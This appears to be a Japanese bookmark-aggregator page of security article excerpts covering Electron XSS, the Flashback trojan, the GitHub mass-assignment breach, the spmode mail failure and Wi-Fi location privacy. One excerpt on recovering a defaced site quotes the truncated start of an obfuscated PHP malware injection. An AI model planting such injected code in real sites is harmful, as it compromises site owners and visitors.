新横浜密着情報シンヨコのサイトPrioritize and remediate risk exposure with Snyk AppRisk for ASPM.
Electronでアプリを書く場合は、気合いと根性でXSSを発生させないようにしなければならない。 - 葉っぱ日記
そのうちもう少しきちんと書きますが、とりあえず時間がないので結論だけ書くと、タイトルが全てでElectronでアプリを書く場合は気合いと根性でXSSを発生させないようにしなければならない。 これまでWebアプリケーション上でXSSが存在したとしても、影響範囲はそのWebアプリケーションの中に留まるので、Webアプリケーションの提供側がそれを許容するのであればXSSの存在に目をつむることもできた。しかし、ElectronアプリでDOM-based XSSが一か所でも発生すると、(おそらく)確実に任意コード実行へとつながり、利用者のPCの(そのユーザー権限での)全機能が攻撃者によって利用できる。 そのため、Electronでアプリケーションを作成する開発者は気合いと根性でXSSを完全につぶさなければならない。 nodeIntegration:falseやContent-Security-Pol
qpstudy 2015.11.14 一歩先を行くインフラエンジニアに知ってほしいSSL/TLS
インフラエンジニアの方向けに、SSL/TLSとは何か、また証明書入手のポイント、HTTPS設定のポイントについて、最新の動向を踏まえて紹介します。また、最後の方で勉強会主催者のリクエストでおまけがあります(^^;
IPひろば:メイン
ISPのアクセスポイントなどがユーザーのPCに割り当てるIPアドレスをもとに、ユーザーの地域(都道府県、市外局番)やインターネット接続に利用している接続回線の種類を判別します。 本IPアドレス検索サービスは、ウィルスの発信元調査や増えつづけるネット犯罪の初期捜査などにご活用ください。また、地域指定型オンライン広告を実施されるポータルサイト様など媒体社様および広告代理店様につきましては広告ターゲティングのご確認用にご利用ください。 ご利用上の注意 IPアドレス検索の地域・接続回線種別の判定は「SURFPOINT™ 」を利用して行われており、またWhois検索結果は各NICやレジストラのWhoisを参照した結果が表示されます。 動作について IPアドレス検索では、一部機能でセッションを利用しています。 動作がおかしい・表示が行われない箇所がある等、ございましたらブラウザの設定が「Cookieを
SSH力をつけよう
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)NTT DATA Technology & Innovation
60万台以上の「Mac」がトロイの木馬「Flashback」に感染か (CNET Japan) - Yahoo!ニュース
あるロシアのアンチウイルス企業によると、50万台以上の「Macintosh(Mac)」が「Flashback」と呼ばれるトロイの木馬に感染しているという。Flashbackは、個人情報を盗むことを目的とするマルウェアパッケージだ。 Dr. Webというその企業は現地時間4月4日に行った独自の報告で、55万台のMacコンピュータが、拡大を続けるそのMacボットネットに感染していることを明かした。しかし、その日のうちに、Dr. WebのマルウェアアナリストであるSorokin Ivan氏は、Flashbackに感染したMacの台数が60万にまで増加し、そのうちの274台はカリフォルニア州クパチーノにあることをTwitterで発表した。 感染したMacの半分以上(57%)が米国にあり、20%はカナダにある、とDr. Webは述べている。 Flashbackが最初に発見されたのは2011年9
GitHubのセキュリティホールがふさがったのでSSH Keyを確認しよう - ただのにっき(2012-03-08)
■ GitHubのセキュリティホールがふさがったのでSSH Keyを確認しよう 先日、Railsアプリにありがちなセキュリティホールがあることが判明したGitHub。詳細は@sora_hによる「github の mass assignment 脆弱性が突かれた件」が非常によくまとまっているので参照のこと。脆弱性の内容そのものもだけど、開発者として脆弱性指摘をどのように受容、対応すべきかを考えさせられる事例だった。 で、これはようするに赤の他人が任意のリポジトリへのコミット権を取得できてしまうという事例だったのだけど、脆弱性の内容をみる限りその他のさまざまな入力もスルーされていた可能性がある。ということで、その対策が(おそらく)なされたのだろう、今朝になってGitHubから「SSH Keyの確認をせよ」というメールがいっせいにユーザに配信された。3日で修正とか、GitHubの中の人もずいぶん
github の mass assignment 脆弱性が突かれた件
Github に脆弱性。やった人は Rails に有りがちな脆弱性を issue に挙げていたが相手にされず、実際にそれを突いてきた。一見 childish だが、それだけ簡単に脆弱な実装がなされてしまうということだ。週明けの今日、Rubyist はまず関連情報に一読を。 — Yuki Nishijima (@yuki24) March 4, 2012 気になって調べたのでメモ。自分も気をつけないとなー。 Public Key Security Vulnerability and Mitigation - github.com/blog/ github に脆弱性があってそれが突かれたらしい。 Rails アプリにありがちな脆弱性の一つ、Mass assignment とかいうタイプの脆弱性である。 mass assignment 脆弱性とは mass assignment 脆弱性とは何か、
脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
asahi.com(朝日新聞社):iPad持ち込んだ防衛省幹部、訓戒処分 職場で使う - 社会
印刷 関連トピックスiPadウィニー 防衛省の井上源三装備施設本部長(57)が執務室にタブレット端末「iPad」を持ち込んでいたとして、防衛省が6日付で内規に基づく訓戒処分にしていたことがわかった。 防衛省によると、井上氏は装備施設本部長に着任直後の2011年8月から11月まで、省内の執務室にiPadを持ち込んだ。iPadでインターネットに接続し、業務用の情報収集などをしていた。「操作性が良かった。大変申し訳ない」と話しているという。 防衛省は「基準に達していない」として処分を公表していない。 海上自衛隊佐世保基地所属の護衛艦「あさゆき」の隊員が06年、私物パソコンにファイル交換ソフト・ウィニーを入れて使用し、「秘」扱いを含む大量の内部資料がネット上に流出した問題を受け、防衛省は私物パソコンの職場への持ち込みを訓令で禁じている。
SPモードメール障害は設計ミス - とある技術屋の戯言
SPモードメールで、メールの発信者が別の人のメールアドレスにすげ替えられてしまうというトラブル。 加入者に強くひも付いたシステムになってるはずなのになんでこんな不思議なことが起きるのか理解できなかったのですが、記者会見での詳細が幾つかのニュースサイトに出ていました。 「あってはならない」個人情報流出の可能性も――ドコモがspモード不具合の経緯を説明 - ITmedia +D モバイル ドコモ、“他人のメアドになる”不具合は解消――10万人に影響 - ケータイ Watch 加入者はIPアドレスで識別されていて、そのひも付けが伝送路障害をきっかけに混乱した、ということのようです。加入者とのひも付けは全然強くない…というか恐ろしいほど弱いシステムでした。 まず、「IPアドレスで加入者を識別する」という思想がかなりやばいと言わざるを得ません。初期iモード時代は無線ネットワークと一体になっていたシ
[続報]spモード障害、なぜ処理能力オーバーで「メールアドレスの置き換え」が起きたのか
2011年12月20日に発生したNTTドコモのspモード障害(関連記事)。一部のサーバーが処理能力不足に陥ったことが、なぜ「自分のメールアドレスが他人のものに置き換わる」という通信の秘密にかかわる事故に発展したのか。大きな理由の1つは、メールアドレスが端末固有のIDでなく、端末に振り出されたIPアドレスとひも付いていた点にある。 Android OS端末がいったん3G網に接続したら、3G網から切断しない限り、端末のIPアドレスは変わらない。端末を再起動したり、あるいは3G網からWiFi網に切り替えたりしない限り、IPアドレスが再度割り振られることはない。家庭の固定網に接続したパソコンに近い仕様といえる。 この仕組みによって、Android OSにおけるIPアドレスは、一時的には端末を識別するIDとして使える。NTTドコモのspモードシステムの場合、3G網に接続して電話番号とIPアドレスをひ
![[続報]spモード障害、なぜ処理能力オーバーで「メールアドレスの置き換え」が起きたのか](https://cdn-ak-scissors.b.st-hatena.com/image/square/bed39b5962a5d552c95b6d796db8f55e72d32943/height=288;version=1;width=512/https%3A%2F%2Fxtech.nikkei.com%2Fimages%2Fn%2Fxtech%2F2020%2Fogp_nikkeixtech_hexagon.jpg%3F20220512)
高木浩光@自宅の日記 - Wi-FiのMACアドレスはもはや住所と考えるしかない
■ Wi-FiのMACアドレスはもはや住所と考えるしかない 目次 まえがき これまでの経緯 2つのMACアドレスで自宅の場所を特定される場合 SSIDに「_nomap」でオプトアウト? PlaceEngineはどうなった? まえがき 先週、以下の件が話題になった。 Greater choice for wireless access point owners, Official Google Blog, 2011年11月14日 Removing your Wi-Fi network from Google's map, CNET News, 2011年11月14日 グーグル、Wi-Fiネットワークの位置情報収集で対応策を公開, CNET Japan, 2011年11月16日 Google's WiFi Opt-Out Process Makes Users Navigate Technic
高木浩光@自宅の日記
■ OECDガイドラインの8原則についてChatGPTに聞いてみた ChatGPTに色々聞いてみるテストは1月にTwitterに結果を報告していた*1が、GPT-4が使えるようになったということで、もう一度やってみた。ChatGPTは基本的に、質問者に迎合しようとする(質問者の期待に応えようとする)ので、ChatGPTが答えたといっても質問者の意図した答えになっているにすぎない(それゆえ、質問者の意図が明確にされず、ChatGPTも知らないことが問われると、全くの出鱈目を答えてしまうという現象が起きるようだ。)わけであるが、それでも、質問者が誘導しているわけでもないのに質問者が必要としていることを言葉の端々から察知して根拠を探してきてくれるような回答をする。以下は、できるだけ誘導しなように(といっても、後ろの方で明確に誘導しているところもあるがw)質問した例だが、最初のうちはChatGPT
ハッキング(笑)の研究してるけれど質問ある? - ゴールデンタイムズ
1 :以下、名無しにかわりましてVIPがお送りします :2011/11/09(水) 07:52:02.95 ID:ULW0dTK40 はいはい厨二厨二 10 :以下、名無しにかわりましてVIPがお送りします :2011/11/09(水) 07:56:49.53 ID:rAyb58Mj0 大学の研究? 19 :以下、名無しにかわりましてVIPがお送りします :2011/11/09(水) 08:03:18.20 ID:ULW0dTK40 >>10 大学の特別研究員もやってるけれど、今はメインは自宅研究員ですお 3 : 忍法帖【Lv=40,xxxPT】 :2011/11/09(水) 07:53:09.89 ID:WgNHOLRk0 レインボーアタックについて分かりやすく教えて 7 :以下、名無しにかわりましてVIPがお送りします :2011/11/09(水) 07:55:28.35 I
「脱獄は避ける」、アップル独自の世界を理解
利用者が急増中のスマートフォンだが、コンピューターウイルスによる端末の“乗っ取り”や情報漏洩などセキュリティ面でのリスクは従来の携帯電話よりも大きい。米アップルの「iPhone」の場合、注意すべき点は六つ。専門家は、「業務用途のiPhoneを『jailbreak(ジェイルブレイク=脱獄の意)』させるのはもってのほかだ」と警告する。 iPhoneのセキュリティ対策は、他のOSを搭載するスマートフォンとはだいぶ違っており独特だ。これを理解するには、iPhoneに特有の利用形態を押さえるとよい。 iPhoneは通常、アップル1社の世界に閉じた使い方になる。ハードウエアと搭載OS「iOS」はアップル製。アプリケーションの入手先も、アップルが運営するマーケットプレース「App Store」に限られる。 ユーザーは一般に、App Storeからしかアプリケーションを入手できない。ただし、この制限をなく
Little Snitch
As soon as you’re connected to the Internet, applications can potentially send whatever they want to wherever they want. Most often they do this to your benefit. But sometimes, like in case of tracking software, trojans or other malware, they don’t. But you don’t notice anything, because all of this happens invisibly under the hood. Alert Mode Decide immediately Whenever an app attempts to connect
必ず入れておきたいMac用アンチウイルスソフト「ClamXav」
Windowsユーザーなら、もちろんアンチウイルスソフトは入っていますよね? まさか入れていない、なんて人はいないと思いますが(そんな人は今すぐLANを外して近所の家電量販店に行って買ってきた方がいいですよ!)、Macとなるとちょっと話は別のようです。 というのも、Macを対象とするウイルス自体が非常に少ない(なにしろユーザーがWindowsユーザーと比較すると少ない)ので、ウイルス対策ソフトを入れてない方もtwitter上でわりといらっしゃいました。 ただ、昨今はMac用のウイルスもちょくちょく発見されますし、自分がそれにかからない、という保証はありません。Macは絶対にウイルスにかからない、というわけではないので、出来る限り自分の身は自分で守らなければ。 例えば、Macでクレジットカードを使って買い物をしたり、ネットバンキングをしたりするのであればなおさらです!自分が知らないうちにウイ
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
ggsoku.com